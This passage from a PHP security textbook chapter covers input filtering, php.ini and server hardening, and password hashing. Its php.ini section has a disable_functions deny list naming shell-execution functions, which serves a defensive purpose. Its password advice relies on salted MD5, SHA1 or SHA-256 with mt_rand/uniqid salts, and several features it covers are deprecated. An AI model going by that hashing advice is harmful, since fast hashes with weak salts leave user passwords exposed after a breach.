var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_QUERY_REQUIRED ) );
//http://www.brian.com/index?q=hey
?>  

The sanitization filters are FILTER_SANITIZE_type where type is one of {EMAIL, ENCODED, MAGIC_QUOTES, FLOAT, INT, SPECIAL_CHARS, STRING, STRIPPED, URL, UNSAFE_RAW}. Of these filters, FILTER_SANITIZE_STRING removes HTML tags, and FILTER_SANITIZE_STRIPPED is an alias of FILTER_SANITIZE_STRING.

There is also FILTER_CALLBACK, which passes the value to a user-defined filtering function.
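
As a brief sketch of FILTER_CALLBACK, the callable is supplied through the 'options' key. The callback normalize_spaces below is a hypothetical function written for this example.

```php
<?php
// Hypothetical callback: collapse runs of whitespace and trim both ends.
function normalize_spaces( $value ) {
    return trim( preg_replace( '/\s+/', ' ', $value ) );
}

$result = filter_var(
    "  Fox   Mulder \n",
    FILTER_CALLBACK,
    array( 'options' => 'normalize_spaces' )
);

var_dump( $result ); // string(10) "Fox Mulder"
```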

Sanitization filters return a modified copy of the value, but do not validate it. Usually we would want to run a variable through a sanitization filter and then a validation filter. Here is an example usage with the EMAIL filter:

Listing 11-18. FILTER_SANITIZE_EMAIL Example

<?php

$email = '([email protected])';
//get rid of the illegal parenthesis characters
$sanitized_email = filter_var( $email, FILTER_SANITIZE_EMAIL );
var_dump( $sanitized_email );
//[email protected]

var_dump( filter_var( $email, FILTER_VALIDATE_EMAIL ) );
//false

var_dump( filter_var( $sanitized_email, FILTER_VALIDATE_EMAIL ) );
//[email protected]
?>

The function filter_var_array is similar to filter_var but can filter multiple variables at a time. For filtering superglobals, you would use one of the following three functions:

  • filter_has_var($type, $variable_name), where $type is one of INPUT_GET, INPUT_POST, INPUT_COOKIE, INPUT_SERVER, or INPUT_ENV and corresponds to the respective superglobal array. Returns whether the variable exists.
  • filter_input, which retrieves a specific external variable by name and optionally filters it.
  • filter_input_array, which retrieves external variables and optionally filters them.
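
Because filter_input and filter_input_array read from the actual request, they are awkward to demonstrate in isolation. The sketch below instead uses filter_var_array on a made-up array, which accepts the same kind of filter definition. The field names and the age limits are assumptions for illustration.

```php
<?php
// Made-up input, standing in for submitted form data.
$input = array(
    'age'   => '42',
    'email' => 'not-an-email',
    'extra' => 'ignored',
);

// One filter per expected field; fields not listed here are dropped.
$definition = array(
    'age'   => array(
        'filter'  => FILTER_VALIDATE_INT,
        'options' => array( 'min_range' => 0, 'max_range' => 150 ),
    ),
    'email' => FILTER_VALIDATE_EMAIL,
);

$result = filter_var_array( $input, $definition );
var_dump( $result );
// 'age' becomes int(42), 'email' becomes bool(false), and 'extra' is absent
```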

Listing 11-19. filter_has_var Example

<?php
// http://localhost/filter_has_var_test.php?test2=hey&test3=

$_GET['test'] = 1;
var_dump( filter_has_var( INPUT_GET, 'test' ) );
//false
var_dump( filter_has_var( INPUT_GET, 'test2' ) );
//true
var_dump( filter_has_var( INPUT_GET, 'test3' ) );
//true
?>

Note The filter_has_var function examines the input as it was originally received, so it returns false for a value that was only assigned to $_GET inside the script and was not sent in the actual query string. It also returns true when the value of the variable is empty.

For filter meta information, use the following two functions:

  • filter_list, which returns a list of supported filters
  • filter_id, which returns the ID of a filter

php.ini and Server Settings

Central to a hardened environment is having a properly configured php.ini file and a secure server/host. If the server is compromised, then any additional security measures we place are in vain. As an example, it is no use filtering data and escaping output in a PHP file if that file becomes writeable to an attacker.

Server Environment

The less a potential attacker knows about our server environment the better. This includes physical server information, whether our site has shared hosting, which modules we are running, and php.ini and file settings. Known security improvements in a new version of Apache, PHP, or a third-party library mean that an attacker will know exactly what can be exploited in an older version. For this reason, we do not want phpinfo() output to be viewable in a production environment. We will later look at how to disable it in php.ini.

On Apache servers, we can use .htaccess to restrict the access and visibility of files. We can also add index files to directories so that directory contents are not listed. It is also important to not allow files to be writeable by the web user unless absolutely necessary. We want to write protect directories and files. Setting directory permissions to 755 and file permissions to 644 limits non-file owners to read access and non-directory owners to read and execute access.

We also cannot depend on a robots.txt file to block web crawlers from reading sensitive data on our site. In fact, it may help direct a malicious crawler straight toward it. For this reason, all sensitive data should be outside of the document root.

If we are in a shared hosting environment, we need to be able to trust that our host uses best practices for security and quickly patches any new vulnerability. Otherwise, exploits on other sites on the server could allow access to our site's files. We will discuss using PHP safe_mode in the next section. Finally, we should go over the server and PHP logs periodically to look for suspicious or erroneous behavior.

Hardening PHP.INI

There are several directives in a php.ini file that should be adjusted for optimum security, which we will go over now.

We want to ensure that in a production environment any potential errors are not output to the screen display, possibly exposing some internal details of our filesystem or script. We still want to be aware of the errors, but not display them.

display_errors = Off                    ; do not display errors
display_startup_errors = Off
log_errors = On                         ; log errors

This extra effort goes to waste if the log files can be found and read. So make sure that the log is written outside of the document root.

error_log = "/somewhere/outside/web/root/"   ; path to the log file, outside the document root
track_errors = Off      ; would keep the last error in the global $php_errormsg; we do not want this
html_errors = Off       ; when On, inserts links to documentation into error messages
expose_php = Off        ; stops the server from adding PHP to its response headers,
                        ; which would reveal that PHP is used on the server
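
Because a library cannot assume that the host's php.ini has been tightened, some of these directives can also be set defensively at runtime. The following is a minimal sketch using ini_set. The log path is a hypothetical placeholder, and expose_php is left out because it can only be set in php.ini itself.

```php
<?php
// Runtime equivalents of the php.ini error settings above.
ini_set( 'display_errors', '0' );   // never show errors to the visitor
ini_set( 'log_errors', '1' );       // but do record them
ini_set( 'html_errors', '0' );      // plain-text error messages

// Hypothetical placeholder: point this at a file outside the document root.
ini_set( 'error_log', sys_get_temp_dir() . '/php_errors_demo.log' );

var_dump( ini_get( 'display_errors' ), ini_get( 'log_errors' ) );
```

Settings made this way only take effect once the script is running, so they do not cover startup errors or parse errors in the same file. The php.ini values remain the primary safeguard.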

As previously discussed, register_globals can be a big security hole, especially if variables are not initialized.

register_globals = Off           ; when On, registers form data as global variables
                                 ; deprecated as of PHP 5.3.0 and removed in PHP 5.4.0

Magic quotes attempts to automatically escape quotes. However, this leads to inconsistencies. It is best to use database functions for this explicitly.

magic_quotes_gpc = Off   ; deprecated as of PHP 5.3.0; use database escaping instead

As previously mentioned, we should keep the SID out of the URL. The following settings restrict the SID to cookies and disable transparent URL-based SIDs.

session.use_cookies = 1
session.use_only_cookies = 1
session.use_trans_sid = 0

We can disable higher risk PHP functions, enabling some if need be.

disable_functions = curl_exec, curl_multi_exec, exec, highlight_file, parse_ini_file, passthru, phpinfo, proc_open, popen, shell_exec, show_source, system
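
Code that may run on a server with some of these functions disabled can read the directive and fall back gracefully. The sketch below assumes a hypothetical helper, parse_disabled_functions, which is not part of PHP; it simply splits the comma-separated value returned by ini_get.

```php
<?php
// Hypothetical helper: turn a disable_functions value into an array of names.
function parse_disabled_functions( $ini_value ) {
    $names = array_map( 'trim', explode( ',', $ini_value ) );
    // Drop empty entries, such as the one produced by an empty directive.
    return array_values( array_filter( $names, 'strlen' ) );
}

$disabled = parse_disabled_functions( (string) ini_get( 'disable_functions' ) );

// Report availability instead of calling a function the host has disabled.
if ( in_array( 'exec', $disabled, true ) ) {
    echo "exec is disabled on this server\n";
} else {
    echo "exec is available\n";
}
```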

There is an equivalent directive for PHP classes, where we can list any classes that we do not want PHP to be able to use.

disable_classes =

We can harden how PHP handles file access and remote files:

allow_url_fopen = Off           ; whether to allow remote files to be opened
allow_url_include = Off         ; whether to allow includes to come from remote files
file_uploads = Off              ; turn off only if your scripts do not need file uploads

The directive open_basedir limits the files that can be opened by PHP to the specified directory and subtree.

open_basedir = /the/base/directory/
enable_dl = Off                         ; dl() can allow bypassing of open_basedir settings
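
open_basedir is enforced by PHP itself, but code that may run on an unhardened server can apply a similar check before opening a file. A minimal sketch follows, assuming a hypothetical helper named path_is_inside. It illustrates the idea and is not a replacement for the directive.

```php
<?php
// Hypothetical helper: true only if $path resolves to a location at or below $base.
function path_is_inside( $path, $base ) {
    $real_base = realpath( $base );
    $real_path = realpath( $path );   // resolves "..", "." and symbolic links
    if ( $real_base === false || $real_path === false ) {
        return false;                 // a path that does not exist is rejected
    }
    $real_base = rtrim( $real_base, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR;
    // The trailing separator stops "/base-other" from matching "/base".
    return strpos( $real_path . DIRECTORY_SEPARATOR, $real_base ) === 0;
}

// Demonstration with a throwaway file in the system temporary directory.
$base = sys_get_temp_dir();
$file = tempnam( $base, 'demo' );
var_dump( path_is_inside( $file, $base ) );          // file inside the base
var_dump( path_is_inside( $base . '/..', $base ) );  // parent of the base
unlink( $file );
```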

For shared hosting, safe_mode restricts PHP scripts to working with files owned by the same user ID as the script itself. However, it does not restrict other scripting languages, such as Bash or Perl, from reaching those files. This limits the actual amount of safety we can expect from this directive.

safe_mode = On          ; deprecated as of PHP 5.3.0 and removed in PHP 5.4.0

Password Algorithms

In this section, we will look at the strength of password hashes. When storing user passwords, we want to use a format that makes it hard for attackers to discover the password even if they hack into our database. For this reason, we never want to store a password as plain text. Hashing functions take an input string and convert it into a fixed length representation.

Hashes are one-way: you cannot recover the input string from the hash. To check a value, you always rehash the input and compare the result to a known, stored hash. The crc32 hash function always represents data as a 32-bit binary number. Because there are more possible strings than representations, hash functions are not one-to-one: there will be distinct strings that generate the same hash. The Message Digest Algorithm (MD5) converts an input string into a 32-character hexadecimal number, which is equivalent to a 128-bit binary number.

Even though hashing is one-way, precomputed results known as rainbow tables provide reverse lookups for some hashes. Rainbow tables for MD5 are well known. For this reason, if a database stores passwords as unsalted MD5 hashes and is compromised, then user passwords can be easily determined.
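
The reverse lookup can be illustrated with a simplified sketch. Real rainbow tables use chains of hashes to trade computation for storage; the plain lookup array below is an assumption made for brevity, and the word list is invented for the example.

```php
<?php
// An attacker prepares the table once, from a list of common passwords.
$common_passwords = array( 'password', '123456', 'letmein', 'qwerty' );
$lookup = array();
foreach ( $common_passwords as $candidate ) {
    $lookup[ md5( $candidate ) ] = $candidate;
}

// Later, a hash leaked from a compromised database is reversed with one lookup.
$leaked_hash = md5( 'letmein' );
echo isset( $lookup[ $leaked_hash ] ) ? $lookup[ $leaked_hash ] : 'not found';
// prints "letmein"
```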

If we use MD5 hashes, we have to make them stronger by salting them. Salting involves appending a string (the salt) to a hashed result and then rehashing the concatenated result. Only someone who knows the salt used for a hash can regenerate that hash from an input string.

In PHP, the function mt_rand is newer and uses a faster algorithm than the rand function. To generate a random value between 1 and 100, we would call:

mt_rand(1, 100);

The function uniqid will generate a unique ID. It has two optional parameters, the first being a prefix and the second being whether to use more entropy (randomness). Using these functions, we can generate a unique salt. See Listing 11-20.

Listing 11-20. Generating a Unique Salt and Rehashing Our Password with It

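<?php
  // $user_input holds the plain-text password submitted by the user
  $salt = uniqid( mt_rand() );                   // unique salt for this password
  $password = md5( $user_input );                // first hash
  $stronger_password = md5( $password.$salt );   // rehash with the salt appended
?>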

We would also need to store the value of $salt in a database for later retrieval and regeneration of the hash.
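
The retrieval step can be sketched as follows. The helper names make_salted_hash and check_password are hypothetical, and the two variables $salt and $stored_hash stand in for values that would be read from the database row for the user.

```php
<?php
// Hypothetical helper mirroring Listing 11-20: hash, append the salt, rehash.
function make_salted_hash( $user_input, $salt ) {
    return md5( md5( $user_input ) . $salt );
}

// Hypothetical helper: regenerate the hash from a login attempt and compare.
function check_password( $user_input, $salt, $stored_hash ) {
    return make_salted_hash( $user_input, $salt ) === $stored_hash;
}

// At registration: generate the salt and store it alongside the hash.
$salt        = uniqid( mt_rand(), true );
$stored_hash = make_salted_hash( 's3cret', $salt );

// At login: the stored salt lets us regenerate the hash and compare.
var_dump( check_password( 's3cret', $salt, $stored_hash ) );  // bool(true)
var_dump( check_password( 'wrong', $salt, $stored_hash ) );   // bool(false)
```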

Stronger than the md5 hash is the US Secure Hash Algorithm 1 (SHA1) hash. PHP has the sha1() function:

$stronger_password = sha1( $password.$salt );

For PHP 5.1.2 and later, you can use the successor of sha1, sha2. As you would expect, sha2 is stronger than sha1. To use sha2, we need to use the more generic hash function, which takes a hash algorithm name as the first parameter and an input string as the second. There are over 30 hash algorithms currently available. The function hash_algos will return a list of all the available hashing algorithms on your version of PHP.

Listing 11-21. Using the Hash Function with the sha2 Algorithm

<?php
  $string = "your_password";
  $sha2_32bit = hash( 'sha256', $string );  // SHA-256 (32-bit words): 256-bit digest, 64 hex characters
  $sha2_64bit = hash( 'sha512', $string );  // SHA-512 (64-bit words): 512-bit digest, 128 hex characters
?>
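
Since the available algorithms vary between PHP builds, it can be worth checking hash_algos before relying on one. A minimal sketch, with variable names chosen only for illustration:

```php
<?php
// Check that the algorithm is available before using it.
$algorithm = 'sha256';
if ( in_array( $algorithm, hash_algos(), true ) ) {
    $digest = hash( $algorithm, 'your_password' );
    // A hex digest uses 4 bits per character: 256 bits give 64 characters.
    echo $algorithm . ': ' . strlen( $digest ) . " hex characters\n";
}

// sha512 produces a 512-bit digest, so its hex form is 128 characters long.
echo 'sha512: ' . strlen( hash( 'sha512', 'your_password' ) ) . " hex characters\n";
```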

Alternatively, the crypt function can be used with several algorithms such as md5, sha256, and sha512. However, it requires stricter salt lengths and a different prefix for each algorithm. As such, it is more difficult to remember the correct syntax to use.
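
As a hedged illustration of that syntax, the sketch below uses crypt with the SHA-512 prefix. The salt text is an arbitrary placeholder; for this algorithm the salt portion can be up to 16 characters, and the rounds value shown is an example setting.

```php
<?php
// '$6$' selects SHA-512; the salt text after rounds= is a placeholder.
$salt = '$6$rounds=5000$examplesaltvalue$';
$hash = crypt( 'your_password', $salt );

// The returned string embeds the prefix and salt, so it can be passed
// back to crypt as the salt argument when checking a login attempt.
var_dump( crypt( 'your_password', $hash ) === $hash );  // bool(true)
var_dump( crypt( 'wrong_guess', $hash ) === $hash );    // bool(false)
```

Because the salt travels inside the hash string, only one value needs to be stored per user with this approach.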

Finally, when building a login system for your site, existing solutions like OpenID or OAuth offer an established and widely tested level of protection. Consider using one of them unless there is a need for a unique solution.

Summary

In this chapter we covered a lot of ground. We discussed the importance of security in PHP scripts. We talked about not trusting any data in our program and escaping output. We discussed using the filter extension and guarding against session fixation, XSS, and CSRF attacks. We also went over SQL injection and keeping our filesystem secure. Finally, we showed how to adjust the php.ini file for security and the strengths of password hashes.

When thinking about security, the main point to remember is that data and the user should not be trusted. While developing an application, we must assume that data could be compromised and that the user is looking for exploits, and take preventative safeguards.
